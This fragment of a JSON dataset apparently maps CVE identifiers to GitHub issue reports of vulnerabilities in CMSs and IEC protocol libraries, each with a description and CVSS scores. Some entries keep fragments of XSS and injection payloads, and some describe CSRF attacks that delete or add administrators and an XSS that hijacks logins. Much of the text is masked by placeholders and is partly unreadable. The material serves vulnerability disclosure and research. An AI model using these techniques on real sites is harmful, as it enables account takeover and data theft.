        "description": "APITAG NUMBERTAG crash report. Architecture : Window NUMBERTAG Crash reason : Access violation (invalid address NUMBERTAG f NUMBERTAG Crashed thread : APITAG NUMBERTAG g WARNING: Continuing a non continuable exception APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] ds NUMBERTAG b NUMBERTAG f NUMBERTAG dd NUMBERTAG f NUMBERTAG f NUMBERTAG fa NUMBERTAG fb2 ???????? ???????? ???????? ???????? ERRORTAG anaysis KEY_VALUES_STRING NUMBERTAG PROCESSES_ANALYSIS NUMBERTAG SERVICE_ANALYSIS NUMBERTAG STACKHASH_ANALYSIS NUMBERTAG TIMELINE_ANALYSIS NUMBERTAG Timeline: APITAG Name: APITAG Time NUMBERTAG APITAG Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG DUMP_CLASS NUMBERTAG DUMP_QUALIFIER NUMBERTAG FAULTING_IP: APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] EXCEPTION_RECORD: (.exr NUMBERTAG APITAG NUMBERTAG b NUMBERTAG APITAG APITAG c NUMBERTAG APITAG violation) APITAG NUMBERTAG APITAG NUMBERTAG Parameter NUMBERTAG Parameter NUMBERTAG f NUMBERTAG Attempt to read from address NUMBERTAG f NUMBERTAG FAULTING_THREAD NUMBERTAG e3c DEFAULT_BUCKET_ID: INVALID_POINTER_READ PROCESS_NAME: FILETAG FOLLOWUP_IP: APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] READ_ADDRESS NUMBERTAG f NUMBERTAG ERROR_CODE: (NTSTATUS NUMBERTAG c NUMBERTAG APITAG to get error code text> EXCEPTION_CODE: (NTSTATUS NUMBERTAG c NUMBERTAG APITAG to get error code text> EXCEPTION_CODE_STR: c NUMBERTAG EXCEPTION_PARAMETER NUMBERTAG EXCEPTION_PARAMETER NUMBERTAG f NUMBERTAG WATSON_BKT_PROCSTAMP NUMBERTAG ad1b NUMBERTAG WATSON_BKT_PROCVER NUMBERTAG PROCESS_VER_PRODUCT: APITAG WATSON_BKT_MODULE: ntdll.dll WATSON_BKT_MODSTAMP NUMBERTAG ddde NUMBERTAG WATSON_BKT_MODOFFSET NUMBERTAG WATSON_BKT_MODVER NUMBERTAG BUILD_VERSION_STRING: APITAG NUMBERTAG MODLIST_WITH_TSCHKSUM_HASH: APITAG MODLIST_SHA1_HASH: APITAG NTGLOBALFLAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APPLICATION_VERIFIER_FLAGS NUMBERTAG PRODUCT_TYPE NUMBERTAG SUITE_MASK NUMBERTAG DUMP_TYPE: fe ANALYSIS_SESSION_HOST: DESKTOP BLBI ANALYSIS_SESSION_TIME NUMBERTAG APITAG ANALYSIS_VERSION NUMBERTAG amd NUMBERTAG fre THREAD_ATTRIBUTES: OS_LOCALE: KOR BUGCHECK_STR: APITAG PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT PROBLEM_CLASSES: ID NUMBERTAG n NUMBERTAG Type: [ APITAG Class: Addendum Scope: BUCKET_ID Name: Omit Data: Omit PID: APITAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG ID NUMBERTAG n NUMBERTAG Type: [INVALID_POINTER_READ] Class: Primary Scope: DEFAULT_BUCKET_ID APITAG Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: APITAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG ID NUMBERTAG n NUMBERTAG Type: [ZEROED_STACK] Class: Addendum Scope: BUCKET_ID Name: Add Data: Omit PID NUMBERTAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG LAST_CONTROL_TRANSFER: from NUMBERTAG b NUMBERTAG c1 to NUMBERTAG b NUMBERTAG STACK_TEXT NUMBERTAG ff NUMBERTAG b NUMBERTAG c NUMBERTAG a2de NUMBERTAG a2de NUMBERTAG fcc APITAG NUMBERTAG ff9dc NUMBERTAG e NUMBERTAG c NUMBERTAG a2de8 APITAG NUMBERTAG ffa NUMBERTAG ea6fc NUMBERTAG ffb NUMBERTAG ffbb8 APITAG NUMBERTAG ffa NUMBERTAG fde NUMBERTAG c NUMBERTAG ca NUMBERTAG e0 APITAG WARNING: Stack unwind information not available. Following frames may be wrong NUMBERTAG ffa6c NUMBERTAG f NUMBERTAG e NUMBERTAG ca NUMBERTAG e NUMBERTAG ffaf NUMBERTAG b8b APITAG NUMBERTAG ffa NUMBERTAG b8b NUMBERTAG ca NUMBERTAG e NUMBERTAG b8fc NUMBERTAG APITAG NUMBERTAG ffaf NUMBERTAG c NUMBERTAG ffbb NUMBERTAG ffb NUMBERTAG ffb NUMBERTAG APITAG NUMBERTAG ffb5c NUMBERTAG ec NUMBERTAG ffbb NUMBERTAG APITAG NUMBERTAG ffb NUMBERTAG e NUMBERTAG a NUMBERTAG ffbb NUMBERTAG ffba NUMBERTAG ffb9c APITAG NUMBERTAG ffbe NUMBERTAG dfbf NUMBERTAG b8fc4aa NUMBERTAG fc3c NUMBERTAG APITAG NUMBERTAG ffc NUMBERTAG d NUMBERTAG ef NUMBERTAG f NUMBERTAG a NUMBERTAG b8fc4e6 APITAG NUMBERTAG ffc NUMBERTAG fd2fc NUMBERTAG b8fc5a NUMBERTAG a NUMBERTAG c4 APITAG NUMBERTAG ffd0c NUMBERTAG e2d NUMBERTAG f NUMBERTAG ffd NUMBERTAG APITAG NUMBERTAG ffd NUMBERTAG e NUMBERTAG c3fdd APITAG NUMBERTAG ffd NUMBERTAG c NUMBERTAG df NUMBERTAG c NUMBERTAG ffddc APITAG NUMBERTAG ffd NUMBERTAG d NUMBERTAG d NUMBERTAG df NUMBERTAG fa NUMBERTAG e NUMBERTAG APITAG NUMBERTAG ffddc NUMBERTAG d NUMBERTAG fd ffffffff NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG NUMBERTAG ffdec NUMBERTAG e7b NUMBERTAG df NUMBERTAG APITAG STACK_COMMAND NUMBERTAG s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: APITAG APITAG APITAG THREAD_SHA1_HASH_MOD: APITAG FAULT_INSTR_CODE NUMBERTAG b NUMBERTAG b SYMBOL_STACK_INDE NUMBERTAG SYMBOL_NAME: APITAG FOLLOWUP_NAME: APITAG MODULE_NAME: ntdll NUMBERTAG IMAGE_NAME: ntdll.dll DEBUG_FLR_IMAGE_TIMESTAMP NUMBERTAG ddde NUMBERTAG FAILURE_BUCKET_ID: APITAG BUCKET_ID: APITAG FAILURE_EXCEPTION_CODE: c NUMBERTAG FAILURE_IMAGE_NAME: ntdll.dll BUCKET_ID_IMAGE_STR: ntdll.dll FAILURE_MODULE_NAME: ntdll NUMBERTAG BUCKET_ID_MODULE_STR: ntdll NUMBERTAG FAILURE_FUNCTION_NAME: APITAG BUCKET_ID_FUNCTION_STR: APITAG BUCKET_ID_OFFSET NUMBERTAG a2 BUCKET_ID_MODTIMEDATESTAMP NUMBERTAG ddde NUMBERTAG BUCKET_ID_MODCHECKSUM NUMBERTAG a NUMBERTAG d BUCKET_ID_MODVER_STR NUMBERTAG BUCKET_ID_PREFIX_STR: APITAG FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: APITAG WATSON_STAGEONE_URL: URLTAG TARGET_TIME NUMBERTAG APITAG OSBUILD NUMBERTAG OSSERVICEPACK NUMBERTAG SERVICEPACK_NUMBER NUMBERTAG OS_REVISION NUMBERTAG OSPLATFORM_TYPE NUMBERTAG OSNAME: Windows NUMBERTAG OSEDITION: Windows NUMBERTAG APITAG APITAG USER_LCID NUMBERTAG OSBUILD_TIMESTAMP: unknown_date BUILDDATESTAMP_STR NUMBERTAG BUILDLAB_STR: rs5_release BUILDOSVER_STR: APITAG NUMBERTAG APITAG NUMBERTAG ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: APITAG FAILURE_ID_HASH: {d7fe NUMBERTAG f NUMBERTAG f NUMBERTAG f5d1b2edc8b}",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20425",
        "Issue_Url_old": "https://github.com/Sea0o/vulnerability/issues/1",
        "Issue_Url_new": "https://github.com/str1am/vulnerability/issues/1",
        "Repo_new": "str1am/vulnerability",
        "Issue_Created_At": "2019-10-17T02:00:20Z",
        "description": "s cms Government station building system exists XSS. \u6253\u5f00\u9996\u9875 FILETAG \u70b9\u51fb\u653f\u5e9c\u5efa\u7ad9\u7cfb\u7edf\u5f97\u9884\u89c8\uff0c\u8fdb\u5165\u9884\u89c8\u7f51\u7ad9 FILETAG APITAG APITAG \u6210\u529f\u5f39\u7a97 FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20426",
        "Issue_Url_old": "https://github.com/Sea0o/vulnerability/issues/2",
        "Issue_Url_new": "https://github.com/str1am/vulnerability/issues/2",
        "Repo_new": "str1am/vulnerability",
        "Issue_Created_At": "2019-10-17T03:38:39Z",
        "description": "s cms Multiple XSS exist in / function / FILETAG in Government station building system. in / function / FILETAG , FILETAG FILETAG APITAG payload\uff1a FILETAG POST\uff1aG_title=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG POST\uff1aG_name=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG POST\uff1aG_msg=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20444",
        "Issue_Url_old": "https://github.com/jact/openclinic/issues/8",
        "Issue_Url_new": "https://github.com/jact/openclinic/issues/8",
        "Repo_new": "jact/openclinic",
        "Issue_Created_At": "2019-09-15T01:19:29Z",
        "description": "LFI on APITAG Admin. APITAG : FILETAG Impact : Anyone login to the the admin account can read files from server like config and maybe can get RCE URLTAG . Fix : remove the FILETAG or you can blacklist the dot and slashes . Hitman APITAG | Blackfoxs Team .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-20486",
        "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/14",
        "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/14",
        "Repo_new": "airpig2011/iec104",
        "Issue_Created_At": "2019-09-23T11:15:59Z",
        "description": "stack buffer overflow at APITAG Hi there, __stack buffer overflow__ in APITAG Snip APITAG ERRORTAG ASAN OUTPUT ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20490",
        "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/5",
        "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/5",
        "Repo_new": "fcovatti/libiec_iccp_mod",
        "Issue_Created_At": "2019-10-10T06:21:33Z",
        "description": "Heap buffer overflow found in client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG seems in some case when the packet can not be accept, the program throw cause heap buffer overflow. APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make ASAN Output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20495",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1246",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1246",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2020-07-31T01:29:29Z",
        "description": "Arbitrary zip file deletion vulnerability in backup plugin. bludit NUMBERTAG has a arbitrary zip file deletion vulnerability in backup plugin NUMBERTAG put a ' FILETAG ' in root directory FILETAG NUMBERTAG replace cookie and APITAG and repeat the post data . CODETAG NUMBERTAG can see the install.zip had deleted . FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20508",
        "Issue_Url_old": "https://github.com/samnabi/shopkit/issues/223",
        "Issue_Url_new": "https://github.com/samnabi/shopkit/issues/223",
        "Repo_new": "samnabi/shopkit",
        "Issue_Created_At": "2019-09-23T04:34:50Z",
        "description": "Login hijacking in register. In the latest version NUMBERTAG First,I found a reflective XSS vulnerability in register. The payload is: ERRORTAG FILETAG Then,I fount this XSS vulnerability could cause login hijacking The payload is: CODETAG When the user enters a username via this link,as shown below FILETAG Then click on the \"log in\" The username and password will be submitted to my link. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20514",
        "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/76",
        "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/76",
        "Repo_new": "magicblack/maccms10",
        "Issue_Created_At": "2019-10-22T12:07:51Z",
        "description": "There is a CSRF vulnerability that can del the administrator account. After the administrator logged in, open the following page. POC: CODETAG Then administrator users numbered NUMBERTAG will be deleted. If the administrators are all deleted, no one can log in.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20582",
        "Issue_Url_old": "https://github.com/sansanyun/mipcms5/issues/5",
        "Issue_Url_new": "https://github.com/sansanyun/mipjz/issues/5",
        "Repo_new": "sansanyun/mipjz",
        "Issue_Created_At": "2019-09-29T07:35:36Z",
        "description": "There is one SSRF vulnerability that can get some sensitive information. Vulnerability location\uff1a APITAG \uff1a FILETAG The problem arises in line NUMBERTAG CODETAG Using curl_exec, APITAG is controllable and only trim is made to the APITAG parameter in the above code without any filtering, and finally the json encoded data is returned. poc: APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20583",
        "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/1",
        "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/1",
        "Repo_new": "0xyu/PHP_Learning",
        "Issue_Created_At": "2019-10-02T09:59:14Z",
        "description": "LJCMS Version NUMBERTAG R NUMBERTAG SQL Injection (latest version). Vulnerability Name: LJCMS Version NUMBERTAG R NUMBERTAG FILETAG SQL Injection (latest version) Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG Location PATHTAG Code \uff1a ERRORTAG \u5728sql\u8bed\u53e5 APITAG The parameters APITAG and APITAG are not wrapped in single quotes. Although the global check for gpc is enabled, and the way to post, get, cookie, etc. is passed, addslashes , but there will be no Defensive measures can be injected in queid or topicid . Test\uff1a FILETAG POC: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20584",
        "Issue_Url_old": "https://github.com/baigoStudio/baigoSSO/issues/13",
        "Issue_Url_new": "https://github.com/baigostudio/baigosso/issues/13",
        "Repo_new": "baigostudio/baigosso",
        "Issue_Created_At": "2019-10-10T12:40:40Z",
        "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(admin_nick) parameter post to the PATHTAG POC: xss payload: APITAG CODETAG Submit this form, after refreshing, you can find that our xss statement was successfully executed. FILETAG FILETAG FILETAG FILETAG Vulnerability Analysis PATHTAG APITAG Line NUMBERTAG It filters the content on the input. FILETAG FILETAG Continue to follow up on this process FILETAG Because the incoming argument is an array, it will go into the APITAG method of line NUMBERTAG FILETAG FILETAG In the NUMBERTAG line, enter the safe function to filter the input content. FILETAG FILETAG Filtering the input content by xss and sql APITAG we can bypass this. payload: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20585",
        "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/3",
        "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/3",
        "Repo_new": "0xyu/PHP_Learning",
        "Issue_Created_At": "2019-10-15T08:04:08Z",
        "description": "Metinfo NUMBERTAG APITAG . Vulnerability Name: Metinfo CMS Background SQL Union Select Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG PATHTAG Line NUMBERTAG ERRORTAG APITAG The input parameters are only filtered by addslashes, but the package is not used during the stitching process. payload: first: Get the id of the data record at APITAG FILETAG second\uff1a\uff1b poc: APITAG post\uff1a CODETAG If the deletion of this poc fails, the first version of the mysql version number is NUMBERTAG if the deletion is successful, the first version of the mysql version number is not NUMBERTAG FILETAG If set the code as NUMBERTAG we can find delete the log data success. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20586",
        "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/4",
        "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/4",
        "Repo_new": "0xyu/PHP_Learning",
        "Issue_Created_At": "2019-10-16T06:41:13Z",
        "description": "XYHCMS NUMBERTAG CSRF. Hi, I would like to report CSRF vulnerability in XYHCMS NUMBERTAG There is a CSRF vulnerability that can change any information (name, email, password, etc.) of the administrator. POC: APITAG to administrator panel NUMBERTAG open FILETAG ERRORTAG eg: APITAG modification FILETAG NUMBERTAG open FILETAG APITAG modification FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.5,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-20593",
        "Issue_Url_old": "https://github.com/alixiaowei/alixiaowei.github.io/issues/1",
        "Issue_Url_new": "https://github.com/alixiaowei/alixiaowei.github.io/issues/1",
        "Repo_new": "alixiaowei/alixiaowei.github.io",
        "Issue_Created_At": "2019-10-13T06:17:06Z",
        "description": "There is one CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a adminuser CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-20595",
        "Issue_Url_old": "https://github.com/lock-upme/OPMS/issues/25",
        "Issue_Url_new": "https://github.com/lock-upme/opms/issues/25",
        "Repo_new": "lock-upme/opms",
        "Issue_Created_At": "2019-10-14T15:18:42Z",
        "description": "There is one CSRF vulnerability that can add the account . Place of backstage set up Organization management exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, add a user CSRF Exp: CODETAG We can construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, As long as the administrator visits can add user. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20597",
        "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/198",
        "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/198",
        "Repo_new": "xuhuisheng/lemon",
        "Issue_Created_At": "2019-10-15T07:55:26Z",
        "description": "lemon \u5b58\u5728\u5b58\u50a8\u578bXSS. \u60a8\u597d\uff0c\u6211\u5728lemon NUMBERTAG SS \u6709\u6548\u8d1f\u8377\uff1a APITAG alert('cookie') APITAG PATHTAG line NUMBERTAG ERRORTAG APITAG \u5229\u7528\uff1a APITAG POC CODETAG \u7ed3\u679c\uff1a \u6267\u884c\u4e86js\u8bed\u53e5\uff0c\u5e76\u5f39\u6846 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20598",
        "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/199",
        "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/199",
        "Repo_new": "xuhuisheng/lemon",
        "Issue_Created_At": "2019-10-15T11:40:35Z",
        "description": "Csrf + Xss combination Can be obtained user cookie. Place of backstage exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, the component information is automatically add. There is an xss in the place of Editing component FILETAG We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie Csrf Exp: ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20600",
        "Issue_Url_old": "https://github.com/alixiaowei/cve_test/issues/2",
        "Issue_Url_new": "https://github.com/alixiaowei/cve_test/issues/2",
        "Repo_new": "alixiaowei/cve_test",
        "Issue_Created_At": "2019-10-16T10:06:25Z",
        "description": "APITAG beta stored Cross Site Scripting Vulnerability. Vulnerability Name: Metinfo CMS stored XSS Vulnerability Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG beta Payload: APITAG file path: PATHTAG line NUMBERTAG code in line NUMBERTAG ERRORTAG Can see APITAG value, did some not filter, and judge some conditions after, and finally write APITAG save to the database in POC\uff1a CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20605",
        "Issue_Url_old": "https://github.com/xuzijia/blog/issues/4",
        "Issue_Url_new": "https://github.com/xuzijia/blog/issues/4",
        "Repo_new": "xuzijia/blog",
        "Issue_Created_At": "2019-09-26T08:15:10Z",
        "description": "Blog CMS NUMBERTAG feedback have a xss vulnerability. \u672a\u8fdb\u884c\u8fc7\u6ee4\u4ee5\u53ca\u5b9e\u4f53\u5316\u7528\u6237\u8f93\u5165\u7684\u5185\u5bb9 \u6709\u6548\u8d1f\u8377\uff1a PATHTAG ) APITAG PATHTAG APITAG \u4ee3\u7801\uff1a FILETAG \u7ed3\u679c\uff1a FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20642",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/5",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/5",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2019-10-09T08:29:30Z",
        "description": "CSRF vulnerability can add htm page to generate XSS. This CSRF vulnerability can add htm page and execute js code such as XSS. This problem was found in APITAG NUMBERTAG This CSRF vulnerability can add an htm page via APITAG After the administrator logs in, he visits the page constructed by the attacker and triggers exp. The htm page will be created in the specified path. The page contains the attacker's js code, which can cause XSS or other problems. CODETAG Poc request packet FILETAG After the csrf vulnerability is triggered, the htm page is created and the reflective XSS is executed. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20645",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/6",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/6",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2019-10-12T07:01:02Z",
        "description": "There is a stored xss in basic_information(\u57fa\u672c\u4fe1\u606f). Tested in NUMBERTAG ersion FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20657",
        "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/1",
        "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/1",
        "Repo_new": "fcovatti/libiec_iccp_mod",
        "Issue_Created_At": "2019-10-10T02:31:18Z",
        "description": "Potential heap buffer overflow found at mms_client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG __ASAN Output__: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20658",
        "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/2",
        "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/2",
        "Repo_new": "fcovatti/libiec_iccp_mod",
        "Issue_Created_At": "2019-10-10T03:44:20Z",
        "description": "Potenial heap buffer overflow found at mms_client_example1.c different from issues1. Hello, I found a potential heap buffer overflow in PATHTAG but unable to locate the trace code, however the deeper cause is found in: PATHTAG when the program try to calloc a large spcae, caused the heap buffer overflow. Below are steps followed to reproduce crash Download latest source code from: PATHTAG compiled with clang and APITAG CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" before make Row data FILETAG ASAN Output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20662",
        "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/6",
        "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/6",
        "Repo_new": "fcovatti/libiec_iccp_mod",
        "Issue_Created_At": "2019-10-10T07:02:23Z",
        "description": "Heap buffer overflow found at mms_client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make __ROW data__: APITAG APITAG __ASAN Output__: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20663",
        "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/7",
        "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/7",
        "Repo_new": "fcovatti/libiec_iccp_mod",
        "Issue_Created_At": "2019-10-10T07:08:43Z",
        "description": "Heap buffer overflow found at mms_client_example1.c different from issues NUMBERTAG Hello, I found a potential heap buffer overflow in PATHTAG but unable to locate the trace code, however the deeper cause is found in: PATHTAG when the program try to calloc a large spcae, caused the heap buffer overflow. APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make APITAG data__ FILETAG ASAN Output: ERRORTAG",
